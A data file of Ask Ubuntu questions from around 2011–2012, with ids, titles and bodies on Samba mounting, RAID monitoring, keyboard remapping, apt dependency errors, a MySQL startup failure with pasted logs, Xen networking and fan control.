102826	samba will not mount a share or browse a mounted device on 11.10	ubuntu 11.10 + samba installed on a dual boot winxp box . all user data is on win ntfs partitions . there are other windows machines in the same workgroup and both the samba and windows workgroups have the same name [ and are so configured in the smb.conf file ] . samba has a nice gui for server configuration , however there is no simple point and click option to have samba automatically mount a device or a share [ such as a local windows partition on this dual boot installation ] on boot and login . in fact , to configure the share in samba , it must be mounted manually in nautilus . there is no issue getting pysdm to mount a device on login [ although pysdm crashes on 11.10 ] - or going through the pain of gksudo gedit /etc/fstab . the point is getting samba to mount the device and browse it as part of the network . samba can open and browse other machines in the workgroup , but devices on the local machine can not be browsed as part of the workgroup , even when the device is mounted locally . the device/share can only be browsed locally as a mounted local device , and attempting to browse as part of the network gets an `` unable to mount location - failed to mount windows share '' error . samba sees the machine name and the shares within , but trying to browse gets the above error . to allow [ local ] access to the device requires a manual single click in nautilus to mount the device ( s ) in question . seems reasonable , that if the device is mounted and can be accessed by the user locally , samba should be able to browse the share as part of the network [ workgroup ] , however , that is not the case . even if the local share was the only member of the workgroup , seems it should be browsable as a network device . is there a simple [ aka gui ] way to get samba to mount the device and browse it as part of the workgroup [ and why is that not offered in the samba server configuration ] ?
102828	additional language in kde	i just installed kde desktop environment and i want to install an additional language ( urdu ) in unity 2d i was using it butt in kde its seems very difficult . some where i get to know about to change some thing in etc/x11/xkb/symbols but when i tried there was no such directory . pleas help me out to wright urdu in kde .
102832	how to know when a drive failed in raid1	i want to make sure my backup are safe . i use one main ssd running ubuntu and i have 2x 2tb hdd in raid1 for my data . how to know when a disk fail ?
102838	no menu option to `` switch user '' in cinnamon desktop	the menu has options to lock the screen , log out and shutdown , but there is n't an option that allows me to switch to a different user . is there another way to do that or , even better , is there a way to add that option to the global menu ? i am using ubuntu 11.10 .
102840	avi video format , join sert subtitles format	ubuntu 11.10 who avi and srt unite in a single file i tried mencoder and output to the command fails me since there are other ways
102841	does ubuntu index thumbnails ?	to keep things quick , does ubuntu index thumbnails so that , next time i enter that folder , it does n't have to reload the thumbnails ? ( this would be especially important in large picture folders . )
102846	remapping keyboard shortcuts ( copy , paste etc ) to alt key instead of ctrl	interestingly , it turns out this is almost impossible to do . remapping alt key to behave as another ctrl key is not a solution because you lose the alt key functionalities ( some of which are essential , like alt+tab ) . so how can i get a behavior similar to macos where cmd key is used for keyboard shortcuts ( but also for switching between windows with cmd+tab ) ? i know i can assign ctrl+tab to switch between windows after i remap alt key as a ctrl key . but then i lose the real ctrl+tab functionality in some applications , which are also critical like switching tabs in chrome . basically my ctrl and alt keys would become the same key and it will be impossible to have two different set of shortcuts for these two modifier keys . a good solution for me would probably be a way to catch alt+c , alt+v , alt+x , etc . at the window management level and send instead a ctrl+c or ctrl+v or ctrl+x etc . to the focused window . on windows this was possible via autohotkey . on linux , i heard about an application called autokey but unlike autohotkey you have to use a gui to set the shortcuts . since i will be writing almost all combinations of alt manually , i do n't want a gui application do to this . i should be able to configure it by writing a text file . is it possible to achieve this either with gnome or xmonad ?
102848	how do i make my media keys work again ?	i am using a thinkpad edge 11 . after the installation i replaced banshee with rhythmbox . everything worked fine for 4 weeks but all of a sudden the media keys stopped working . i need to press and hold the fn button to use the media keys . i ran $ sudo showkey and it shows that i press the fn button ( code 143 ) but nothing when i then press one of the media keys ( f1 to f9 to be precise ) . the media keys from f11 to f12 work ( play/pause and next track ) .
102849	apt-get upgrade fails due to dependency issues	i 'm trying to upgrade and while doing so , i get the following : devteam @ hephaestusx : ~/projects $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libboost-python-dev : depends : libboost-python1.46-dev but it is not installed e : unmet dependencies . try using -f. devteam @ hephaestusx : ~/projects $ apt-get -f install e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? devteam @ hephaestusx : ~/projects $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libboost-python1.46-dev libboost1.46-dev suggested packages : libboost1.46-doc libboost-date-time1.46-dev libboost-filesystem1.46-dev libboost-graph1.46-dev libboost-iostreams1.46-dev libboost-math1.46-dev libboost-program-options1.46-dev libboost-random1.46-dev libboost-regex1.46-dev libboost-serialization1.46-dev libboost-signals1.46-dev libboost-system1.46-dev libboost-test1.46-dev libboost-thread1.46-dev libboost-wave1.46-dev doxygen default-jdk fop the following new packages will be installed : libboost-python1.46-dev libboost1.46-dev 0 upgraded , 2 newly installed , 0 to remove and 2 not upgraded . 6 not fully installed or removed . need to get 0 b/8,151 kb of archives . after this operation , 80.1 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 226442 files and directories currently installed . ) unpacking libboost1.46-dev ( from ... /libboost1.46-dev_1.46.1-5ubuntu2_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libboost1.46-dev_1.46.1-5ubuntu2_amd64.deb ( -- unpack ) : trying to overwrite '/usr/include/boost/aligned_storage.hpp ' , which is also in package libboost1.40-dev 1.40.0-6ubuntu1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking libboost-python1.46-dev ( from ... /libboost-python1.46-dev_1.46.1-5ubuntu2_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libboost-python1.46-dev_1.46.1-5ubuntu2_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/libboost_python-py26.a ' , which is also in package libboost-python1.40-dev 1.40.0-6ubuntu1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libboost1.46-dev_1.46.1-5ubuntu2_amd64.deb /var/cache/apt/archives/libboost-python1.46-dev_1.46.1-5ubuntu2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any idea on how to remedy this ?
102864	how can i tell the ubuntu installer to use another partition ?	when i 'm getting here : the installer wo n't let me install because it does n't determine the d : partition . it complains that there is not enough space on the c : partition . how can i tell the installer to install on d : ?
102868	ubuntu 11.10 x64 is not loading after a hard reset .	hi my system was not resuming from sleep mode so i just did a hard reset ( press and hold the power button for reset ) . now the system is not loading after booting . simply cursor is blinking , but if i select the recovery mode it will stop with error message failed to spawn friendly-recovery post-stop process . attached the screen shot of the error screen . nothing is happening after that . even alt+ctrl+del wo n't work . please help me . thanks in advance . gopakumar
102870	are drivers available for ubuntu kodak 7.1 hero printer ?	this looks like a nice printer i came across at a local store . its the `` kodak 7.1 hero '' . i can not seem to find if this will work on ubuntu and if drivers are easily obtainable ? the official site only says `` windows & mac '' , but i have seen a youtube video showing the google cloud printing feature working in ubuntu . the video was in german so i couldnt make sense of it . ive also check the open printers website and no info there . any help would be appreciated ! thanks !
102872	installation and configuration	i have in fact two questions . imagine that i install a new package , a driver or i change something in the screen configuration , and after rebooting i have some troubles for example nothing appears on the screen or unity configuration changed . is there a clean way to save a general configuration of the system and then to come back to this one if i did some mistakes ? how can i reinstall my ubuntu without loosing my emails ( thunderbird ) and my documents ? any suggestion will be accepted .
102874	juju ssh setup in orchestra environment	for orchestra , must the public keys be copied to the nodes before 'juju bootstrap ' is run for the first time ?
102875	mysql 5.5 starts and then instantly stops	mysql 5.5 on ubuntu 10.10 used to work well until yesterday but today whenever i start mysql using mysqld_safe as root user it shows starting mysqld daemon with databases from /var/lib/mysql and then shows pid ended i have n't run any updates recently but i used the mysql administrator to connect to a remote database but mysql administrator was installed one month ago . i then examined the error file error.log and found this : 120210 02:33:23 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql 120210 2:33:23 [ warning ] ignoring user change to '=root ' because the user was set to 'mysql ' earlier on the command line 120210 2:33:23 [ error ] ca n't find messagefile '/usr/share/errmsg.sys' 120210 2:33:23 innodb : the innodb memory heap is disabled 120210 2:33:23 innodb : mutexes and rw_locks use gcc atomic builtins 120210 2:33:23 innodb : compressed tables use zlib 1.2.5 120210 2:33:23 innodb : using linux native aio 120210 2:33:23 innodb : initializing buffer pool , size = 128.0m 120210 2:33:23 innodb : completed initialization of buffer pool 120210 2:33:23 innodb : highest supported file format is barracuda . 120210 2:33:24 innodb : waiting for the background threads to start 120210 2:33:25 innodb : 1.1.8 started ; log sequence number 1595675 120210 2:33:25 [ error ] aborting 120210 2:33:25 innodb : starting shutdown ... 120210 2:33:26 innodb : shutdown completed ; log sequence number 1595675 120210 2:33:26 [ note ] 120210 02:33:26 mysqld_safe mysqld from pid file /var/lib/mysql/lovesh-inspiron-n4050.pid ended edit : as asked by huckle the ps -aux goes like this user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.0 2884 1740 ? ss feb09 0:01 /sbin/init root 2 0.0 0.0 0 0 ? s feb09 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s feb09 0:06 [ ksoftirqd/0 ] root 4 0.0 0.0 0 0 ? s feb09 0:00 [ migration/0 ] root 5 0.0 0.0 0 0 ? s feb09 0:00 [ watchdog/0 ] root 6 0.0 0.0 0 0 ? s feb09 0:00 [ migration/1 ] root 7 0.0 0.0 0 0 ? s feb09 0:04 [ ksoftirqd/1 ] root 8 0.0 0.0 0 0 ? s feb09 0:00 [ watchdog/1 ] root 9 0.0 0.0 0 0 ? s feb09 0:00 [ migration/2 ] root 10 0.0 0.0 0 0 ? s feb09 0:06 [ ksoftirqd/2 ] root 11 0.0 0.0 0 0 ? s feb09 0:00 [ watchdog/2 ] root 12 0.0 0.0 0 0 ? s feb09 0:00 [ migration/3 ] root 13 0.0 0.0 0 0 ? s feb09 0:03 [ ksoftirqd/3 ] root 14 0.0 0.0 0 0 ? s feb09 0:00 [ watchdog/3 ] root 15 0.0 0.0 0 0 ? s feb09 0:00 [ events/0 ] root 16 0.0 0.0 0 0 ? s feb09 0:00 [ events/1 ] root 17 0.0 0.0 0 0 ? s feb09 0:00 [ events/2 ] root 18 0.0 0.0 0 0 ? s feb09 0:00 [ events/3 ] root 19 0.0 0.0 0 0 ? s feb09 0:00 [ cpuset ] root 20 0.0 0.0 0 0 ? s feb09 0:00 [ khelper ] root 21 0.0 0.0 0 0 ? s feb09 0:00 [ netns ] root 22 0.0 0.0 0 0 ? s feb09 0:00 [ async/mgr ] root 23 0.0 0.0 0 0 ? s feb09 0:00 [ pm ] root 25 0.0 0.0 0 0 ? s feb09 0:00 [ sync_supers ] root 26 0.0 0.0 0 0 ? s feb09 0:00 [ bdi-default ] root 27 0.0 0.0 0 0 ? s feb09 0:00 [ kintegrityd/0 ] root 28 0.0 0.0 0 0 ? s feb09 0:00 [ kintegrityd/1 ] root 29 0.0 0.0 0 0 ? s feb09 0:00 [ kintegrityd/2 ] root 30 0.0 0.0 0 0 ? s feb09 0:00 [ kintegrityd/3 ] root 31 0.0 0.0 0 0 ? s feb09 0:00 [ kblockd/0 ] root 32 0.0 0.0 0 0 ? s feb09 0:00 [ kblockd/1 ] root 33 0.0 0.0 0 0 ? s feb09 0:00 [ kblockd/2 ] root 34 0.0 0.0 0 0 ? s feb09 0:00 [ kblockd/3 ] root 35 0.0 0.0 0 0 ? s feb09 0:00 [ kacpid ] root 36 0.0 0.0 0 0 ? s feb09 0:00 [ kacpi_notify ] root 37 0.0 0.0 0 0 ? s feb09 0:00 [ kacpi_hotplug ] root 38 0.0 0.0 0 0 ? s feb09 0:00 [ ata_aux ] root 39 0.0 0.0 0 0 ? s feb09 0:00 [ ata_sff/0 ] root 40 0.0 0.0 0 0 ? s feb09 0:00 [ ata_sff/1 ] root 41 0.0 0.0 0 0 ? s feb09 0:00 [ ata_sff/2 ] root 42 0.0 0.0 0 0 ? s feb09 0:00 [ ata_sff/3 ] root 43 0.0 0.0 0 0 ? s feb09 0:00 [ khubd ] root 44 0.0 0.0 0 0 ? s feb09 0:00 [ kseriod ] root 45 0.0 0.0 0 0 ? s feb09 0:00 [ kmmcd ] root 46 0.0 0.0 0 0 ? s feb09 0:00 [ khungtaskd ] root 47 0.0 0.0 0 0 ? s feb09 0:00 [ kswapd0 ] root 48 0.0 0.0 0 0 ? sn feb09 0:00 [ ksmd ] root 49 0.0 0.0 0 0 ? s feb09 0:00 [ aio/0 ] root 50 0.0 0.0 0 0 ? s feb09 0:00 [ aio/1 ] root 51 0.0 0.0 0 0 ? s feb09 0:00 [ aio/2 ] root 52 0.0 0.0 0 0 ? s feb09 0:00 [ aio/3 ] root 53 0.0 0.0 0 0 ? s feb09 0:00 [ ecryptfs-kthr ] root 54 0.0 0.0 0 0 ? s feb09 0:00 [ crypto/0 ] root 55 0.0 0.0 0 0 ? s feb09 0:00 [ crypto/1 ] root 56 0.0 0.0 0 0 ? s feb09 0:00 [ crypto/2 ] root 57 0.0 0.0 0 0 ? s feb09 0:00 [ crypto/3 ] root 62 0.0 0.0 0 0 ? s feb09 0:00 [ pciehpd ] root 64 0.0 0.0 0 0 ? s feb09 0:00 [ kstriped ] root 65 0.0 0.0 0 0 ? s feb09 0:00 [ kmpathd/0 ] root 66 0.0 0.0 0 0 ? s feb09 0:00 [ kmpathd/1 ] root 67 0.0 0.0 0 0 ? s feb09 0:00 [ kmpathd/2 ] root 68 0.0 0.0 0 0 ? s feb09 0:00 [ kmpathd/3 ] root 69 0.0 0.0 0 0 ? s feb09 0:00 [ kmpath_handle ] root 70 0.0 0.0 0 0 ? s feb09 0:00 [ ksnapd ] root 71 0.0 0.0 0 0 ? s feb09 0:12 [ kondemand/0 ] root 72 0.0 0.0 0 0 ? s feb09 0:10 [ kondemand/1 ] root 73 0.0 0.0 0 0 ? s feb09 0:10 [ kondemand/2 ] root 74 0.0 0.0 0 0 ? s feb09 0:07 [ kondemand/3 ] root 75 0.0 0.0 0 0 ? s feb09 0:00 [ kconservative ] root 76 0.0 0.0 0 0 ? s feb09 0:00 [ kconservative ] root 77 0.0 0.0 0 0 ? s feb09 0:00 [ kconservative ] root 78 0.0 0.0 0 0 ? s feb09 0:00 [ kconservative ] root 298 0.0 0.0 0 0 ? s feb09 0:00 [ scsi_eh_0 ] root 309 0.0 0.0 0 0 ? s feb09 0:00 [ scsi_eh_1 ] root 310 0.0 0.0 0 0 ? s feb09 0:00 [ scsi_eh_2 ] root 312 0.0 0.0 0 0 ? s feb09 0:00 [ scsi_eh_3 ] root 318 0.0 0.0 0 0 ? s feb09 0:01 [ scsi_eh_4 ] root 319 0.0 0.0 0 0 ? s feb09 0:00 [ scsi_eh_5 ] root 337 0.0 0.0 0 0 ? s feb09 0:00 [ scsi_eh_6 ] root 338 0.0 0.0 0 0 ? s feb09 0:04 [ usb-storage ] root 356 0.0 0.0 0 0 ? s feb09 0:00 [ jbd2/sda3-8 ] root 357 0.0 0.0 0 0 ? s feb09 0:00 [ ext4-dio-unwr ] root 358 0.0 0.0 0 0 ? s feb09 0:00 [ ext4-dio-unwr ] root 359 0.0 0.0 0 0 ? s feb09 0:00 [ ext4-dio-unwr ] root 360 0.0 0.0 0 0 ? s feb09 0:00 [ ext4-dio-unwr ] root 392 0.0 0.0 0 0 ? s feb09 0:00 [ flush-8:0 ] root 422 0.0 0.0 2524 872 ? s feb09 0:00 upstart-udev-br root 424 0.0 0.0 2624 1016 ? s < s feb09 0:00 udevd -- daemon root 621 0.0 0.0 0 0 ? s feb09 0:00 [ kpsmoused ] root 868 0.0 0.0 0 0 ? s feb09 0:00 [ i915 ] root 908 0.0 0.0 0 0 ? s feb09 0:00 [ hci0 ] syslog 958 0.0 0.0 34600 1140 ? sl feb09 0:00 rsyslogd -c4 root 959 0.0 0.0 5636 2212 ? ss feb09 0:00 /usr/sbin/sshd 102 999 0.0 0.0 3576 1948 ? ss feb09 0:02 dbus-daemon -- s avahi 1006 0.0 0.0 3012 1372 ? s feb09 0:00 avahi-daemon : r root 1007 0.0 0.1 19268 4340 ? ssl feb09 0:01 networkmanager avahi 1008 0.0 0.0 3012 440 ? s feb09 0:00 avahi-daemon : c root 1012 0.0 0.0 4432 2460 ? s feb09 0:00 /usr/sbin/modem root 1037 0.0 0.0 4328 2120 ? ss feb09 0:01 /usr/sbin/bluet root 1051 0.0 0.0 0 0 ? s feb09 0:00 [ l2cap ] root 1060 0.0 0.0 0 0 ? s < feb09 0:00 [ kslowd000 ] root 1061 0.0 0.0 0 0 ? s < feb09 0:00 [ kslowd001 ] root 1062 0.0 0.0 1856 560 tty4 ss+ feb09 0:00 /sbin/getty -8 root 1066 0.0 0.0 1856 564 tty5 ss+ feb09 0:00 /sbin/getty -8 root 1080 0.0 0.0 1856 560 tty2 ss+ feb09 0:00 /sbin/getty -8 root 1081 0.0 0.0 1856 568 tty3 ss+ feb09 0:00 /sbin/getty -8 root 1084 0.0 0.0 1856 564 tty6 ss+ feb09 0:00 /sbin/getty -8 root 1087 0.0 0.0 4904 2280 ? s feb09 0:07 /sbin/wpa_suppl root 1090 0.0 0.0 2112 960 ? ss feb09 0:00 acpid -c /etc/a root 1095 0.0 0.0 2928 612 ? ss feb09 0:01 /usr/sbin/irqba root 1104 0.0 0.0 19540 3224 ? ssl feb09 0:00 gdm-binary root 1116 0.0 0.0 2024 636 ? ss feb09 0:00 /usr/sbin/inetd root 1124 0.0 0.0 21192 3120 ? sl feb09 0:00 /usr/sbin/conso root 1196 0.0 0.0 0 0 ? s feb09 0:00 [ hd-audio0 ] root 1200 0.0 0.0 21536 3816 ? sl feb09 0:00 /usr/lib/gdm/gd daemon 1201 0.0 0.0 2316 356 ? ss feb09 0:00 atd root 1202 0.0 0.0 2456 904 ? ss feb09 0:00 cron root 1215 0.0 0.0 0 0 ? s < feb09 0:00 [ krfcommd ] root 1216 0.0 0.0 13300 1460 ? ss feb09 0:00 /usr/sbin/winbi root 1271 8.8 0.8 63836 35016 tty7 rs+ feb09 18:52 /usr/bin/x :0 - root 1313 0.0 0.0 13300 980 ? s feb09 0:00 /usr/sbin/winbi root 1337 0.0 0.0 6792 2512 ? ss feb09 0:00 /usr/sbin/cupsd gdm 1378 0.0 0.0 3456 576 ? s feb09 0:00 /usr/bin/dbus-l root 1410 0.0 0.0 20120 3276 ? sl feb09 0:00 /usr/lib/gdm/gd root 1438 0.0 0.3 17564 12256 ? s feb09 0:08 /usr/lib/upower rtkit 1442 0.0 0.0 22992 1216 ? snl feb09 0:00 /usr/lib/rtkit/ root 1446 0.0 0.1 6924 4220 ? s feb09 0:00 /usr/lib/policy root 1521 0.0 0.0 1856 564 tty1 ss+ feb09 0:00 /sbin/getty -8 gdm 1580 0.0 0.0 28296 3916 ? ss feb09 0:00 /usr/bin/gnome- lovesh 1606 0.0 0.0 41380 2916 ? sl feb09 0:00 /usr/bin/gnome- lovesh 1625 0.0 0.1 35848 7128 ? ssl feb09 0:00 gnome-session lovesh 1656 0.0 0.0 3352 196 ? ss feb09 0:00 /usr/bin/ssh-ag lovesh 1659 0.0 0.0 3456 576 ? s feb09 0:00 /usr/bin/dbus-l lovesh 1660 0.0 0.0 5004 2212 ? ss feb09 0:03 /bin/dbus-daemo lovesh 1665 0.0 0.1 9232 4164 ? s feb09 0:04 /usr/lib/libgco lovesh 1666 0.0 0.3 155224 13608 ? sl feb09 0:01 gnome-power-man lovesh 1674 0.0 0.3 100192 12096 ? ssl feb09 0:05 /usr/lib/gnome- lovesh 1678 0.0 0.0 7540 2308 ? s feb09 0:00 /usr/lib/gvfs/g lovesh 1686 0.0 0.0 30644 2108 ? ssl feb09 0:00 /usr/lib/gvfs// lovesh 1690 0.0 0.5 101212 23128 ? sl feb09 0:00 /usr/bin/python lovesh 1693 0.0 0.4 82704 18120 ? sl feb09 0:09 gnome-panel lovesh 1694 0.0 0.3 154756 14296 ? sl feb09 0:11 /usr/bin/metaci lovesh 1696 1.7 0.1 162168 7380 ? s < sl feb09 3:47 /usr/bin/pulsea lovesh 1698 0.0 0.2 38464 9100 ? sl feb09 0:00 /usr/lib/evolut lovesh 1699 0.3 1.3 169024 54932 ? sl feb09 0:41 nautilus lovesh 1701 0.0 0.1 19128 5872 ? s feb09 0:00 /usr/lib/policy lovesh 1703 0.0 0.2 74540 9456 ? sl feb09 0:00 bluetooth-apple lovesh 1706 0.0 0.4 161360 18504 ? sl feb09 0:05 nm-applet -- sm- lovesh 1709 0.0 0.0 27716 2836 ? ss feb09 0:00 /usr/bin/gnome- lovesh 1718 0.0 0.0 20688 3300 ? sl feb09 0:00 /usr/lib/pulsea lovesh 1729 0.0 0.0 52552 3592 ? ssl feb09 0:00 /usr/lib/bonobo lovesh 1734 0.0 0.0 34392 3672 ? s feb09 0:00 /usr/lib/gvfs/g root 1736 0.0 0.0 16356 3436 ? sl feb09 0:00 /usr/lib/udisks root 1737 0.0 0.0 5620 1004 ? s feb09 0:03 udisks-daemon : lovesh 1745 0.1 0.3 80040 14816 ? sl feb09 0:23 /usr/lib/gnome- lovesh 1747 0.0 0.2 77428 11272 ? sl feb09 0:01 /usr/lib/gnome- lovesh 1752 0.0 0.0 8180 2188 ? s feb09 0:00 /usr/lib/gvfs/g lovesh 1754 0.0 0.0 17976 2244 ? sl feb09 0:00 /usr/lib/gvfs/g lovesh 1757 0.0 0.0 7788 3068 ? s feb09 0:01 /usr/lib/gvfs/g lovesh 1761 0.0 0.0 13452 2940 ? s feb09 0:00 /usr/bin/obex-d lovesh 1768 0.0 0.4 93436 16356 ? sl feb09 0:03 /usr/lib/gnome- lovesh 1769 0.0 0.3 88040 14280 ? sl feb09 0:04 /usr/lib/indica lovesh 1770 0.0 0.2 31076 8980 ? sl feb09 0:00 /usr/lib/gnome- lovesh 1771 0.0 0.3 86860 13416 ? sl feb09 0:00 /usr/lib/indica lovesh 1782 0.0 0.0 7920 2512 ? s feb09 0:00 /usr/lib/gvfs/g lovesh 1784 0.0 0.1 26908 5180 ? sl feb09 0:00 /usr/lib/indica lovesh 1787 0.0 0.0 15716 3648 ? s feb09 0:00 /usr/lib/indica lovesh 1788 0.0 0.1 87248 5304 ? s feb09 0:00 /usr/lib/indica lovesh 1794 0.0 0.1 29012 4640 ? sl feb09 0:00 /usr/lib/indica lovesh 1796 0.0 0.1 18040 4120 ? s feb09 0:00 /usr/lib/indica lovesh 1808 0.0 0.0 7440 2388 ? s feb09 0:00 /usr/lib/gvfs/g lovesh 1819 0.0 0.1 19124 6616 ? s feb09 0:00 /usr/lib/gnome- lovesh 1835 0.0 0.3 31052 13028 ? sl feb09 0:00 /usr/bin/python lovesh 1836 0.0 0.0 3896 248 ? s feb09 0:00 /bin/cat lovesh 1840 0.0 0.4 31736 17032 ? s feb09 0:01 /usr/bin/python lovesh 1849 0.0 0.3 77124 12888 ? sl feb09 0:06 /usr/lib/notify lovesh 2787 8.3 5.8 695972 236972 ? sl feb09 15:13 /usr/lib/firefo lovesh 2868 0.8 0.5 112724 23436 ? sl feb09 1:32 /usr/lib/firefo lovesh 3148 0.3 1.9 184408 78468 ? sl feb09 0:28 evince /home/lo lovesh 3152 0.0 0.0 22316 2340 ? sl feb09 0:00 /usr/lib/evince root 3645 0.0 0.3 56292 12484 ? ss feb09 0:00 /usr/local/apac daemon 4133 0.0 0.3 56656 13152 ? s feb09 0:00 /usr/local/apac daemon 4134 0.0 0.3 56656 13152 ? s feb09 0:00 /usr/local/apac daemon 4136 0.0 0.2 56292 11880 ? s feb09 0:00 /usr/local/apac daemon 4153 0.0 0.4 58820 19716 ? s feb09 0:00 /usr/local/apac daemon 4160 0.0 0.3 56692 13260 ? s feb09 0:00 /usr/local/apac daemon 4161 0.0 0.3 56676 13176 ? s feb09 0:00 /usr/local/apac daemon 4162 0.0 0.3 56656 13372 ? s feb09 0:00 /usr/local/apac daemon 4163 0.0 0.4 57516 17028 ? s feb09 0:00 /usr/local/apac lovesh 4675 0.1 0.4 135576 18392 ? sl feb09 0:09 geany /home/lov lovesh 4676 0.0 0.0 2052 704 ? s feb09 0:00 gnome-pty-helpe lovesh 4677 0.0 0.0 7356 3900 pts/1 ss+ feb09 0:00 /bin/bash daemon 4699 0.0 0.2 56292 11880 ? s feb09 0:00 /usr/local/apac daemon 4701 0.0 0.2 56292 11620 ? s feb09 0:00 /usr/local/apac root 5220 0.0 0.0 0 0 ? s < feb09 0:00 [ kbnepd bnep0 ] root 5222 0.0 0.0 2296 1020 ? s feb09 0:00 /sbin/dhclient lovesh 6307 0.0 0.3 95876 14756 ? sl feb09 0:05 gnome-terminal lovesh 6310 0.0 0.0 2052 720 ? s feb09 0:00 gnome-pty-helpe also the ls -lah /var/lib/mysql goes like this total 30m drwx -- -- -- 5 mysql root 4.0k 2012-02-09 23:36 . drwxr-xr-x 74 root root 4.0k 2011-12-17 10:31 .. -rw-rw -- -- 1 mysql mysql 18m 2012-02-09 23:36 ibdata1 -rw-rw -- -- 1 mysql mysql 5.0m 2012-02-09 23:36 ib_logfile0 -rw-rw -- -- 1 mysql mysql 5.0m 2011-11-14 23:44 ib_logfile1 drwx -- -- -- 2 mysql root 4.0k 2011-11-14 23:44 mysql -rw-rw -- -- 1 mysql mysql 28k 2011-11-14 23:44 mysql-bin.000001 -rw-rw -- -- 1 mysql mysql 974k 2011-11-14 23:44 mysql-bin.000002 -rw-rw -- -- 1 mysql mysql 38 2011-11-14 23:44 mysql-bin.index drwx -- -- -- 2 mysql mysql 4.0k 2011-11-14 23:44 performance_schema drwx -- -- -- 2 mysql root 4.0k 2011-11-14 23:44 test here is the output of namei -lo /var/lib/mysql f : /var/lib/mysql drwxr-xr-x root root / drwxr-xr-x root root var drwxr-xr-x root root lib drwx -- -- -- mysql root mysql
102876	why is network-manager adding 10 more seconds to shutdown time ?	without network-manager installed , my system shuts down in 2 or 3 seconds . why does it take almost 15 seconds ( which is a 5-time increase ) with network-manager installed and ca n't this time be shortened ?
102882	how long does it take to partition during installation , and what happens if i restart	i am installing ubuntu from a usb disk , i am following this : http : //www.ubuntu.com/download/ubuntu/download i was relying on ubuntu 's installation to do the partitioning for me , i had only one partition with windows 7 installed . now it is supposed to be doing the partitioning and it has been about an hour . is it safe to restart the pc now ? i want to get back to my data on windows .
102883	scripts for hybrid graphics discreete card disable on startup	a lot of time ago i 've used a simple script in /etc/rc.local to disable discrete graphics during bootup . but now it 's not allowed to do anything with /sys/kernel/debug/vgaswitcheroo/switch when you not logged in as root ( i can use it only after `` sudo su '' ) , so the script can not do anything . any ideas how to escalate privileges or simply how to make it work ? thanx in advance .
102895	problem installing ubuntu in my new computer	i have a new computer with an nvidia graphics card and i 'm trying to install ubuntu . any version newer than natty will freeze in this state : this case is me trying to install 11.10 . whats weird is that natty works just fine ! what could i do ?
102901	get kingston datatraveler locker+ working under ubuntu 11.10	i have procured a 16gb kingston datatraveler locker+ usb 2.0 memory stick with 256-bit aes hardware based encryption . the official manual confirms that linux is unsupported , but i wondered if there might be a way round this . does anyone know if it is possible to get this type of drive working under ubuntu , and if so , how ?
102907	how to use self signed certificate with an svn client	when i access to a svn repository with https , i have the follwing error : ssl handshake failed : ssl error : a tls warning alert has been received . i target a svn server ( with mod_dav ) with a self signed certificate . thanks for your help .
102910	ubuntu server 10.04 lts & xen intermittent networking	i have been setting up a xen server with 10.04 lts server installed . every so often , the network seems to hang . for example 64 bytes from 192.168.1.109 : icmp_req=1317 ttl=64 time=0.381 ms 64 bytes from 192.168.1.109 : icmp_req=1318 ttl=64 time=0.397 ms 64 bytes from 192.168.1.109 : icmp_req=1319 ttl=64 time=0.402 ms 64 bytes from 192.168.1.109 : icmp_req=1320 ttl=64 time=0.391 ms 64 bytes from 192.168.1.109 : icmp_req=1321 ttl=64 time=0.403 ms 64 bytes from 192.168.1.109 : icmp_req=1322 ttl=64 time=0.380 ms 64 bytes from 192.168.1.109 : icmp_req=1323 ttl=64 time=0.394 ms 64 bytes from 192.168.1.109 : icmp_req=1324 ttl=64 time=0.370 ms 64 bytes from 192.168.1.109 : icmp_req=1325 ttl=64 time=0.385 ms 64 bytes from 192.168.1.109 : icmp_req=1326 ttl=64 time=0.400 ms 64 bytes from 192.168.1.109 : icmp_req=1327 ttl=64 time=0.373 ms 64 bytes from 192.168.1.109 : icmp_req=1328 ttl=64 time=0.390 ms dsf ssd 64 bytes from 192.168.1.109 : icmp_req=1354 ttl=64 time=0.403 ms 64 bytes from 192.168.1.109 : icmp_req=1355 ttl=64 time=0.415 ms 64 bytes from 192.168.1.109 : icmp_req=1356 ttl=64 time=0.426 ms 64 bytes from 192.168.1.109 : icmp_req=1357 ttl=64 time=0.405 ms 64 bytes from 192.168.1.109 : icmp_req=1358 ttl=64 time=0.420 ms first off , this output is weird . just before i tapped on the keyboard producing dsf to where the network came back below tapping ssd i would have expected the time to be large . i.e . in the order of about 15 seconds as that is how long it took to come back . as it so happens , this ping output was from another machine to the xen server . i have a very similar output from the xen machine to my other machine . while this was going on , i had a ping to google.com running and this pausing did not happen . what could be causing this ? i have no virtual machines running yet . i would like to point out , that i have had this exact same issue occur on another high end xen testing computer ( different hardware ) . i 'd like to be able to say it 's a simple configuration problem , or a known issue with ubuntu 10.04 lts . by the way , the server is using dhcp . i 'll try first setting it to a static address and see what effect that has if any . * edit * there seems to be some problems in ubuntu server 10.04 with the dhcp client . what i 've found is firstly that the dhcpd.leases file could not be written to because of a path problem . so creating /etc/dhcp fixed that . but the problem still existed . changing to a static ip and the problem is completely gone . however , i do want to use dhcp to provision some dynamic xen servers so i do need to solve this . i might try updating the dhcp package .
102916	what do i do to slow down fan ?	i have an athlon x2 4600 on an asus m2n32ws pro mainboard bios dated 2006 . since upgrading to ubuntu 11.10 fan runs constantly . i have run pwmconfig , however , fan still runs at a higher speed than i feel is necessary . i would like it to only run this fast when it is necessary and be quiet the rest of the time .
